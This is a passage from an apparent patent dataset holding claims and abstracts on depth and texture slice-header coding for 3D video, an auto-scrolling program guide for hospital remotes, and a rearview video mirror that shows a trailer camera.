signaling an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 10. A device for decoding data, comprising a video decoder configured to receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice, receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit, decode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice, determine common syntax elements for a second slice from the slice header of the first slice, and decode the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 11. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 12. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 13. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 14. The device of claim 10, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 15. The device of claim 10, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 16. The device of claim 10, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, wherein the video decoder is further configured to determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 17. The device of claim 10, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 18. The device of claim 10, wherein the video coder is further configured to signal an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 19. A computer program product comprising a computer-readable storage medium having stored thereon instructions that, when executed, cause a processor of a video decoding device to:
receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; decode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determine common syntax elements for a second slice from the slice header of the first slice; and decode the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 20. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 21. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 22. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 23. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 24. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 25. The computer-readable storage medium of claim 19, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the instructions further cause a processor of a video decoding device to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 26. A device for processing video data, comprising:
means for receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; means for receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; means for decoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; means for determining common syntax elements for a second slice from the slice header of the first slice; and means for decoding the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 27. The device of claim 26, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 28. A method of encoding video data, the method comprising:
receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; encoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determining common syntax elements for a second slice from the slice header of the first slice; and encoding the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 29. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 30. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 31. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 32. The method of claim 28, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 33. The method of claim 28, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 34. The method of claim 28, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the method further comprising:
determining a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 35. The method of claim 28, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 36. The method of claim 28, further comprising:
signaling an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 37. A device for encoding data, comprising a video encoder configured to receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice, receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit, encode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice, determine common syntax elements for a second slice from the slice header of the first slice, and encode the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 38. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 39. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 40. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 41. The device of claim 37, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 42. The device of claim 37, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 43. The device of claim 37, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, and wherein the video encoder is further configured to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 44. The device of claim 37, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 45. The device of claim 37, wherein the video encoder is further configured to:
signal an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 46. A computer program product comprising a computer-readable storage medium having stored thereon instructions that, when executed, cause a processor of a video encoding device to:
receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; code a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determine common syntax elements for a second slice from the slice header of the first slice; and code the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 47. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 48. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 49. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 50. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 51. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 52. The computer-readable storage medium of claim 46, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the instructions further cause a processor of a video encoding device to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 53. A device for processing video data, comprising:
means for receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; means for receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; means for encoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; means for determining common syntax elements for a second slice from the slice header of the first slice; and means for encoding the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, without repeating values for syntax elements that are common to the first slice. 54. The device of claim 53, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. | 2,400 |
9,105 | 9,105 | 15,990,819 | 2,421 | Methods and apparatus for improving channel browsing experience for users by presenting an automatically appearing and automatically scrolling program guide are described. The methods and apparatus are well suited for use with remote control devices with limited numbers of input buttons, e.g., under five buttons, but can be used with remote controls with more buttons. The program guide can be used to allow access to a grid guide to users of hospital remotes or other remotes with limited input keys, e.g., an up down arrow and/or a power button. The method in some embodiments uses time spent on a channel in combination with user selection of an input key to determine an action to be taken, e.g., enter or display the program grid guide and/or select a channel and/or corresponding program being displayed in the grid guide. | 1. A method of operating a device to implement a program guide, comprising:
modifying a program channel lineup to generate a modified program lineup, said modifying the program channel lineup including placing an automatic guide channel at a first position and at a second position in the program channel lineup, said first and second positions being adjacent, in said modified program lineup, a position of the current channel being displayed; and taking an action based on the modified program channel lineup in response to a user pressing an up button or a down button on a remote control. 2. The method of claim 1, wherein said step of modifying a program channel lineup includes adding the automatic program guide channel to the program channel lineup above the current channel being displayed and also adding the automatic program guide channel to the program channel lineup below the current channel being displayed. 3. The method of claim 2, wherein taking an action based on the modified program channel lineup in response to the user pressing an up or down button on the remote control includes tuning to the automatic program guide channel in response to the user pressing said up or down button on the remote control. 4. The method of claim 3, wherein said automatic program guide channel has a single channel number which is placed both above and below the channel number of the current channel in said modified program channel lineup. 5. The method of claim 3, further comprising:
automatically displaying a program guide in response to the user channel change selection indicated by the user pressing an up or down button. 6. The method of claim 5, further comprising:
automatically scrolling through program channels while displaying said program guide; and wherein automatically displaying a program guide includes: highlighting a portion of the displayed program guide, said highlighted portion including a program channel. 7. The method of claim 5, further comprising:
in response to a user channel change selection being made while said program guide is being displayed, switching from displaying said program guide to outputting said highlighted program channel. 8. The method of claim 2,
wherein said remote control does not include number keys for controlling program channel selections. 9. The method of claim 8,
wherein said user device is a set top box in a hospital or rehabilitation center; and wherein said remote control includes only up and down arrow buttons for controlling program channel selections; and wherein said remote control is a wired hospital bed remote control device. 10. The method of claim 9, further comprising:
monitoring user input; and changing a scroll rate used to control automatic channel scrolling during presentation of said program guide as a function of said monitored input. 11. The method of claim 10, wherein monitoring user input includes monitoring the time between user selection of channel change buttons. 12. The method of claim 1, further comprising:
displaying a current channel prior to performing said step of modifying the program channel lineup. 13. The method of claim 1, wherein a program guide is not displayed while displaying the current channel. 14. A system comprising:
a display; and a user device coupled to the display, the user device including a processor configured to control the user device to:
modify a program channel lineup to generate a modified program lineup, said modifying the program channel lineup including placing an automatic guide channel at a first position and at a second position in the program channel lineup, said first and second positions being adjacent, in said modified program lineup, a position of the current channel being displayed; and
take an action based on the modified program channel lineup in response to a user pressing an up button or a down button on a remote control. 15. The system of claim 14, wherein said processor controls the user device, as part of modifying the program channel lineup, to add the automatic program guide channel to the program channel lineup above the current channel being displayed and also add the automatic program guide channel to the program channel lineup below the current channel being displayed. 16. The system of claim 15, wherein said processor controls the user device, as part of taking an action based on the modified program channel lineup in response to the user pressing an up or down button on the remote control to tune to the automatic program guide channel in response to the user pressing said up or down button on the remote control. 17. The system of claim 16, wherein said automatic program guide channel has a single channel number which is placed both above and below the channel number of the current channel in said modified program channel lineup. 18. The system of claim 16, wherein said processor further controls the user device to automatically display a program guide in response to the user channel change selection indicated by the user pressing an up or down button. | Methods and apparatus for improving channel browsing experience for users by presenting an automatically appearing and automatically scrolling program guide are described. The methods and apparatus are well suited for use with remote control devices with limited numbers of input buttons, e.g., under five buttons, but can be used with remote controls with more buttons. The program guide can be used to allow access to a grid guide to users of hospital remotes or other remotes with limited input keys, e.g., an up down arrow and/or a power button. The method in some embodiments uses time spent on a channel in combination with user selection of an input key to determine an action to be taken, e.g., enter or display the program grid guide and/or select a channel and/or corresponding program being displayed in the grid guide.1. A method of operating a device to implement a program guide, comprising:
modifying a program channel lineup to generate a modified program lineup, said modifying the program channel lineup including placing an automatic guide channel at a first position and at a second position in the program channel lineup, said first and second positions being adjacent, in said modified program lineup, a position of the current channel being displayed; and taking an action based on the modified program channel lineup in response to a user pressing an up button or a down button on a remote control. 2. The method of claim 1, wherein said step of modifying a program channel lineup includes adding the automatic program guide channel to the program channel lineup above the current channel being displayed and also adding the automatic program guide channel to the program channel lineup below the current channel being displayed. 3. The method of claim 2, wherein taking an action based on the modified program channel lineup in response to the user pressing an up or down button on the remote control includes tuning to the automatic program guide channel in response to the user pressing said up or down button on the remote control. 4. The method of claim 3, wherein said automatic program guide channel has a single channel number which is placed both above and below the channel number of the current channel in said modified program channel lineup. 5. The method of claim 3, further comprising:
automatically displaying a program guide in response to the user channel change selection indicated by the user pressing an up or down button. 6. The method of claim 5, further comprising:
automatically scrolling through program channels while displaying said program guide; and wherein automatically displaying a program guide includes: highlighting a portion of the displayed program guide, said highlighted portion including a program channel. 7. The method of claim 5, further comprising:
in response to a user channel change selection being made while said program guide is being displayed, switching from displaying said program guide to outputting said highlighted program channel. 8. The method of claim 2,
wherein said remote control does not include number keys for controlling program channel selections. 9. The method of claim 8,
wherein said user device is a set top box in a hospital or rehabilitation center; and wherein said remote control includes only up and down arrow buttons for controlling program channel selections; and wherein said remote control is a wired hospital bed remote control device. 10. The method of claim 9, further comprising:
monitoring user input; and changing a scroll rate used to control automatic channel scrolling during presentation of said program guide as a function of said monitored input. 11. The method of claim 10, wherein monitoring user input includes monitoring the time between user selection of channel change buttons. 12. The method of claim 1, further comprising:
displaying a current channel prior to performing said step of modifying the program channel lineup. 13. The method of claim 1, wherein a program guide is not displayed while displaying the current channel. 14. A system comprising:
a display; and a user device coupled to the display, the user device including a processor configured to control the user device to:
modify a program channel lineup to generate a modified program lineup, said modifying the program channel lineup including placing an automatic guide channel at a first position and at a second position in the program channel lineup, said first and second positions being adjacent, in said modified program lineup, a position of the current channel being displayed; and
take an action based on the modified program channel lineup in response to a user pressing an up button or a down button on a remote control. 15. The system of claim 14, wherein said processor controls the user device, as part of modifying the program channel lineup, to add the automatic program guide channel to the program channel lineup above the current channel being displayed and also add the automatic program guide channel to the program channel lineup below the current channel being displayed. 16. The system of claim 15, wherein said processor controls the user device, as part of taking an action based on the modified program channel lineup in response to the user pressing an up or down button on the remote control to tune to the automatic program guide channel in response to the user pressing said up or down button on the remote control. 17. The system of claim 16, wherein said automatic program guide channel has a single channel number which is placed both above and below the channel number of the current channel in said modified program channel lineup. 18. The system of claim 16, wherein said processor further controls the user device to automatically display a program guide in response to the user channel change selection indicated by the user pressing an up or down button. | 2,400 |
9,106 | 9,106 | 16,170,075 | 2,482 | A video mirror system includes an interior rearview mirror assembly and a video display screen disposed in a mirror head and behind a reflective element of the mirror assembly. When the video mirror system is operating in a mirror mode, the video display screen is deactivated and the reflective element provides a reflected rearward view for the driver of the vehicle. When the video mirror system is in a display mode, the video display screen is activated and displays video images viewable through the reflective element. The video display screen, when activated, displays video images derived from image data captured by a vehicle-mounted rear viewing camera or, with a trailer hitched to the vehicle, a trailer-mounted rear viewing camera. The displayed video images may correspond to a rearward view similar to the field of view provided by the reflective element when in the mirror mode. | 1. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an interior portion of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived from image data captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, displays video images derived from image data captured by the trailer-mounted rear viewing camera; and wherein the displayed video images provide a rearward view that is similar to the mirror-reflected rearward view provided by said transflective mirror reflector of said transflective mirror reflective element when said video mirror system operates in the mirror mode. 2. The video mirror system of claim 1, wherein the trailer-mounted rear viewing camera comprises an analog camera. 3. The video mirror system of claim 1, wherein the trailer-mounted rear viewing camera comprises an imaging array having at least one million pixels. 4. The video mirror system of claim 1, wherein said trailer-mounted rear viewing camera comprises an imaging array having at least two million pixels. 5. The video mirror system of claim 1, wherein said video mirror system, responsive to determination of hitching to the vehicle of the trailer with the trailer-mounted rear viewing camera, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. 6. The video mirror system of claim 1, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, said video display screen displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera. 7. The video mirror system of claim 1, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, said video display screen displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 8. The video mirror system of claim 1, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 9. The video mirror system of claim 1, wherein the vehicle-mounted rear viewing camera comprises a digital camera, and wherein the trailer-mounted rear viewing camera comprises an analog camera. 10. The video mirror system of claim 1, wherein said mirror head and said transflective mirror reflective element are adjustable relative to the interior portion of the vehicle between (i) a mirror mode orientation, where said video mirror system operates in the mirror mode and the driver of the vehicle views rearward of the vehicle via said transflective mirror reflective element, and (ii) a display mode orientation, where said video mirror system operates in the display mode and said video display screen is activated and the driver of the vehicle views displayed video images through said transflective mirror reflective element. 11. The video mirror system of claim 10, wherein said mirror head and said transflective mirror reflective element pivot about a horizontal pivot axis between the mirror mode orientation and the display mode orientation. 12. The video mirror system of claim 1, wherein the interior portion of the vehicle comprises an in-cabin surface of a windshield of the vehicle. 13. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an in-cabin surface of a windshield of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived from image data captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, displays video images derived from image data captured by the trailer-mounted rear viewing camera; and wherein said video mirror system, responsive to determination of hitching to the vehicle of the trailer with the trailer-mounted rear viewing camera, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. 14. The video mirror system of claim 13, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, said video display screen displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera. 15. The video mirror system of claim 13, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, said video display screen displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 16. The video mirror system of claim 13, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 17. The video mirror system of claim 13, wherein said mirror head and said transflective mirror reflective element are adjustable relative to the windshield of the vehicle between (i) a mirror mode orientation, where said video mirror system operates in the mirror mode and the driver of the vehicle views rearward of the vehicle via said transflective mirror reflective element, and (ii) a display mode orientation, where said video mirror system operates in the display mode and said video display screen is activated and the driver of the vehicle views displayed video images through said transflective mirror reflective element, and wherein said mirror head and said transflective mirror reflective element pivot about a horizontal pivot axis between the mirror mode orientation and the display mode orientation. 18. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an interior portion of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived from image data captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera; and wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 19. The video mirror system of claim 18, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 20. The video mirror system of claim 19, wherein said display device, responsive to receipt of a wireless communication from said trailer-mounted rear viewing camera indicative of the trailer with the trailer-mounted rear viewing camera being hitched to the vehicle, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. | A video mirror system includes an interior rearview mirror assembly and a video display screen disposed in a mirror head and behind a reflective element of the mirror assembly. When the video mirror system is operating in a mirror mode, the video display screen is deactivated and the reflective element provides a reflected rearward view for the driver of the vehicle. When the video mirror system is in a display mode, the video display screen is activated and displays video images viewable through the reflective element. The video display screen, when activated, displays video images derived from image data captured by a vehicle-mounted rear viewing camera or, with a trailer hitched to the vehicle, a trailer-mounted rear viewing camera. The displayed video images may correspond to a rearward view similar to the field of view provided by the reflective element when in the mirror mode.1. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an interior portion of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived from image data captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, displays video images derived from image data captured by the trailer-mounted rear viewing camera; and wherein the displayed video images provide a rearward view that is similar to the mirror-reflected rearward view provided by said transflective mirror reflector of said transflective mirror reflective element when said video mirror system operates in the mirror mode. 2. The video mirror system of claim 1, wherein the trailer-mounted rear viewing camera comprises an analog camera. 3. The video mirror system of claim 1, wherein the trailer-mounted rear viewing camera comprises an imaging array having at least one million pixels. 4. The video mirror system of claim 1, wherein said trailer-mounted rear viewing camera comprises an imaging array having at least two million pixels. 5. The video mirror system of claim 1, wherein said video mirror system, responsive to determination of hitching to the vehicle of the trailer with the trailer-mounted rear viewing camera, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. 6. The video mirror system of claim 1, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, said video display screen displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera. 7. The video mirror system of claim 1, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, said video display screen displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 8. The video mirror system of claim 1, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 9. The video mirror system of claim 1, wherein the vehicle-mounted rear viewing camera comprises a digital camera, and wherein the trailer-mounted rear viewing camera comprises an analog camera. 10. The video mirror 